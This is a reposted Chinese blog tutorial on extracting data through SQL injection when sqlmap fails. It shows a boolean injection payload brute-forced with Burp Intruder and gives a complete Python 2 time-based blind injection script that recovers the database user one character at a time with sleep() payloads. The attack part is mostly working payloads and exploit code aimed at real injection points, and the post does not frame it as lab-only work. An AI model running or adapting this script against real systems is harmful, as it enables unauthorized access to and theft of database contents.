专栏首页Bypass当sqlmap跑不出数据怎么办

当sqlmap跑不出数据怎么办

你有没有遇到这样的场景,好不容易找到了一个SQL注入点,扔到SqlMap,爆错,怎么也跑不出数据。

这里分享两个很有效的小技巧,帮助你摆脱这种困境。前提是,你需要构造出有效的Pyaload。

第一种方法:利用BurpSuite实现半自动化盲注

为了方便演示,这里直接使用字符,构造SQL Payload:

?id=1 and substring(user(),1,1)='r'

步骤一:使用Burp抓包,发送到Intruder,设置模式和变量

步骤二:设置字典,变量1设置为 Numbers 1-20,变量2 设置为大小写字母+特殊字符

步骤三:Start attack,处理一下结果,依次排序,用户名为 root@localhost。

第二种方法:编写Python盲注脚本

编写Python脚本实现延迟注入,稍微改一下Payload就可以使用。

Python脚本实现延迟注入脚本:

import urllib
import urllib2
import time
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'  }
values={}
print 'Start to retrive user:'
user= ''
 
for i in range(1, 20):
    for payload in payloads:
        try: 
            values['id']="1 xor if(ascii(mid(user(),%s,1))=%s,sleep(5),0)" %(i,ord(payload))
            data = urllib.urlencode(values)
            url = "http://127.0.0.1/test.php"
            request = urllib2.Request(url,data,headers=header)
            response = urllib2.urlopen(request,timeout=5)
            result=response.read()
            print '.',
        except:
            user += payload
            print '\n[in progress]', user
            time.sleep(3.0)
            break

Python运行效果:

本文分享了两个SQL注入的小技巧,再结合手工注入,基本上能够解决很多SQL注入数据获取的问题。

本文分享自微信公众号 - Bypass(Bypass--),作者:Bypass

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-05-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 【代码审计】CLTPHP_v5.5.3前台XML外部实体注入漏洞

    在代码审计中,发现了微信接口存在XML外部实体注入漏洞,后面和小伙伴sn00py交流,他也发现了这个点。XML外部实体注入漏洞的代码实例比较少,这边也分享一下思...

    Bypass
  • 【渗透技巧】XSS三重URL编码绕过实例

    跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中...

    Bypass
  • 【代码审计】LaySNS_v2.2.0漏洞分析

    LaySNS轻社区是一套基于ThinkPHP5+LayUI开发的集内容发布与社区交流与一体的综合网站系统。它的界面清新而大气,简洁而优雅。本文以LayS...

    Bypass
  • CDH 6.3.1整合Zeppelin 0.8.2

    Zeppelin是一个基于Web的笔记本,可以直接在浏览器中编写代码,对数据进行查询分析并生成报表或图表,做出数据驱动的、交互、协作的文档,并且可...

    用户1148526
  • 美科学家开发4D相机,让机器人可以看清物体有多远

    时需要收集不同视角的信息,以便理解周围环境的特点,比如不同物体的运动和材料构成。 由美国斯坦福大学和加利福尼亚大学圣迭戈分校研究人员专为机器人研制的这种4D相...

    机器人网
  • 典型数据库架构设计与实践 | 架构师之路

    本文,将介绍数据库架构设计中的一些基本概念,常见问题以及对应解决方案,为了便于读者理解,将以“用户中心”数据库为例,讲解数据库架构设计的常见玩法。

    Javen
  • MySQL锁机制及优化

    总的来说,MySQL各存储引擎使用了三种类型(级别)的锁定机制:行级锁定,页级锁定和表级锁定。下面我们先分析一下MySQL这三种锁定的特点和各自的优劣所在。

    lyb-geek
  • SQL自动化上线的初步设计

    所以两者结合起来,应该是大家都希望看到的情况。但是从我的理解来说,我是不希望在初期的时候就推行自动化上线的。因为隐患太多,需要填补各种潜在的坑和复杂的业务场景。...

    jeanron100
  • Typecho评论时可能出现的错误

    根据URL得知应该是在发评论的时候出现的错误。很奇怪,因为很久之前这位博友jiuki's blog也给我反馈过一次。说明这问题不是偶然出现的,所以必须要解决才行...

    Melody132
  • Flutter 实战 - 用贝塞尔曲线画一个带文本的波浪球 Widget

    flutter 中的自定义 Widget 算作是 flutter 体系中比较高阶的知识点之一了,相当于原生开发中的自定义 View,以我个人的感受来说,自定义 ...

    叶应是叶

扫码关注云+社区

领取腾讯云代金券